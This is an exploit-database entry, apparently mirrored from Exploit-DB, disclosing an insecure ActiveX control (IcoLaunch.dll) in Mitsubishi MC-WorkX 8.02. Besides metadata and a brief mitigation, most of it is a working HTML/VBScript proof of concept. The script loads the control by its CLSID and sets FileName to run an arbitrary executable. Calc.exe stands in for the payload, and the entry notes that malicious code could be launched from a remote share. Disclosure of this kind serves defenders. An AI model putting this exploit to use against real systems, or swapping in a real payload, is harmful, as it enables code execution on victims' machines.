Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)

vendor:

MC-WorkX

by:

Blake

8,8

CVSS

HIGH

Insecure ActiveX Control

284

CWE

Product Name: MC-WorkX

Affected Version From: MC-WorkX 8.02

Affected Version To: MC-WorkX 8.02

Patch Exists: NO

Related CWE: N/A

CPE: a:mitsubishi_electric_automation:mc-workx:8.02

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 / IE 6

2020

Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)

This proof of concept will launch an arbritrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.

Mitigation:

Disable ActiveX controls in the browser settings or use a browser that does not support ActiveX.

Source

Exploit-DB raw data:

<html>
<object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object>
<!--
Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll
Vendor: http://www.meau.com
Version: MC-WorkX 8.02
Tested on: Windows XP SP3 / IE 6
Download: http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000
Author: Blake

CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D
ProgId: ICOLAUNCHLib.LaunchCtl
Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll
MemberName: FileName
Safe for scripting: True
Safe for init: True
Kill Bit: False
-->

<title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title>
<p>This proof of concept will launch an arbritrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p>

<script language='vbscript'>
file="C:\\WINDOWS\\system32\\calc.exe"
target.FileName = file
</script>